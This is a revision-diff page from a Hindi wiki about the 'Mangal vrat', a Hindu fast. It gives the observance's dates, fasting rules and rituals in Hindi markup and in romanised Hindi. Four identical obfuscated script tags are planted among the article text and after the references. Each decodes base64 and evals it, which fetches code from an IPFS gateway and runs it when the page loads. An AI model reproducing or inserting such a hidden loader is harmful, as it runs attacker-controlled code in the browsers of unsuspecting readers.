Difference between revisions of "मंगल व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - ")</ref" to "</ref")
 
(8 intermediate revisions by 5 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
{{बहुविकल्प|बहुविकल्पी शब्द=मंगल|लेख का नाम=मंगल (बहुविकल्पी)}}
 +
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[आश्विन]] की [[कृष्ण पक्ष|कृष्ण]] [[अष्टमी]] पर यह व्रत किया जाता है।   
 
*[[आश्विन]] की [[कृष्ण पक्ष|कृष्ण]] [[अष्टमी]] पर यह व्रत किया जाता है।   
 
*[[माघ]], [[चैत्र]] या [[श्रावण]] में भी यह व्रत किया जाता है।
 
*[[माघ]], [[चैत्र]] या [[श्रावण]] में भी यह व्रत किया जाता है।
*यह आगे की [[शुक्ल पक्ष|शुक्लाष्टमी]] तक की जाती है;
+
*यह आगे की [[शुक्ल पक्ष|शुक्लाष्टमी]] तक की जाती है।
 
*अष्टमी को एकभक्त; कुमारियों तथा देवी भक्तों को भोजन कराया जाता है।  
 
*अष्टमी को एकभक्त; कुमारियों तथा देवी भक्तों को भोजन कराया जाता है।  
 
*[[नवमी]] को नक्त, [[दशमी]] को अयाचित तथा [[एकादशी]] को उपवास किया जाता है।  
 
*[[नवमी]] को नक्त, [[दशमी]] को अयाचित तथा [[एकादशी]] को उपवास किया जाता है।  
*बार-बार करना; प्रतिदान दान, होम, जप, पूजा, एक कुमारियों को भोजन; पशु बलि, नृत्य, नाटक एवं संगीत से जागरण किया जाता है।  
+
*बार-बार करना; प्रतिदान दान, होम, जप, पूजा, एक कुमारियों को भोजन कराया जाता है।
*देवी के 18 नामों का जाप किया जाता है<ref> हेमाद्रि (व्रत0 2, 332-335, देवीपुराण से उद्धरण)</ref>
+
*पशु बलि, नृत्य, नाटक एवं संगीत से जागरण किया जाता है।  
 +
*देवी के 18 नामों का जाप किया जाता है।<ref>हेमाद्रि (व्रत0 2, 332-335, देवीपुराण से उद्धरण</ref>
 
 
 
 
 
+
{{संदर्भ ग्रंथ}}
 
 
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:52, 27 July 2011

chitr:Disamb2.jpg mangal ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- mangal (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ashvin ki krishna ashtami par yah vrat kiya jata hai.
  • magh, chaitr ya shravan mean bhi yah vrat kiya jata hai.
  • yah age ki shuklashtami tak ki jati hai.
  • ashtami ko ekabhakt; kumariyoan tatha devi bhaktoan ko bhojan karaya jata hai.
  • navami ko nakt, dashami ko ayachit tatha ekadashi ko upavas kiya jata hai.
  • bar-bar karana; pratidan dan, hom, jap, pooja, ek kumariyoan ko bhojan karaya jata hai.
  • pashu bali, nrity, natak evan sangit se jagaran kiya jata hai.
  • devi ke 18 namoan ka jap kiya jata hai.[1]

  <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat0 2, 332-335, devipuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>